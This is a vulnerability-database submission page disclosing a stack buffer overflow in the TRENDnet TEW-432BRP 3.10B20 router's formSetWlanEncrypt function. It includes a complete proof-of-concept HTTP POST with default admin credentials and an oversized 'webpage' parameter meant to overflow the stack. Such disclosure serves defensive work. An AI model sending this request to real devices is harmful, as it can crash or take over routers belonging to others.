Soumettre #814773: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflowinformation

TitreTRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
DescriptionIn formSetWlanEncrypt function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetWlanEncrypt HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/wlan_security.asp?t=1777347015970 Upgrade-Insecure-Requests: 1 wep_type=1&auth_type=2&wep_key_type=0&wep_key_len=5&wep_def_key=0&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&eap_type=0&cipher_type=0&wpapsk1=12345678&wpapsk2=12345678&radius_ip1=x.x.x.x&radius_port1=1812&radius_pass1=&radius_ip2=x.x.x.x&radius_port2=1812&radius_pass2=&save=1&restore_wireless=&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=onchange&wps_clear_configure_by_reg=0
La source⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_16/16.md
Utilisateur
 pjq_Buoy (UID 97666)
Soumission28/04/2026 09:14 (il y a 1 mois)
Modérer30/05/2026 18:28 (1 month later)
StatutAccepté
Entrée VulDB367460 [TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage buffer overflow]
Points20

PrécédentAperçuSuivant

Want to know what is going to be exploited?

We predict KEV entries!